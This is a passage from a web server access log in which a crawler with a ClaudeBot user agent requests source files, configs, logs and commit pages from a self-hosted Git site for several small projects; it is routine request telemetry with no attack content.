-[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 33590] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14532] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 35798] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 33395] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14813] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11492] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 216.73.216.188] [Length 16071] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 216.73.216.188] [Length 21775] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 12726] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 15508] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 216.73.216.188] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 10927] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 22667] [Gzip 10.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 23692] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11869] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 13223] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.Notebook" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38719] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 216.73.216.188] [Length 12458] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 216.73.216.188] [Length 22718] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument" [Client 216.73.216.188] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 216.73.216.188] [Length 11047] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 10931] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 216.73.216.188] [Length 11437] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=open&type=all" [Client 216.73.216.188] [Length 9942] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16435] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 15906] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14160] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 216.73.216.188] [Length 11861] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11271] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 216.73.216.188] [Length 13894] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11038] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13840] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html" [Client 216.73.216.188] [Length 14624] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 31258] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13662] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15550] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11665] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 68302] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm" [Client 216.73.216.188] [Length 9808] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 11491] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11846] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.vscode" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 24057] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 216.73.216.188] [Length 11424] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.gitignore" [Client 216.73.216.188] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.gitignore" [Client 216.73.216.188] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 216.73.216.188] [Length 12973] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.gitignore" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=all&type=all" [Client 216.73.216.188] [Length 9910] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fpackages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx.conf" [Client 216.73.216.188] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13049] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 11059] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore" [Client 216.73.216.188] [Length 11673] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 216.73.216.188] [Length 11545] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 216.73.216.188] [Length 14357] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 10962] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 15696] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=source" [Client 216.73.216.188] [Length 12192] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 11739] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.gitignore" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 216.73.216.188] [Length 11016] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13143] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" 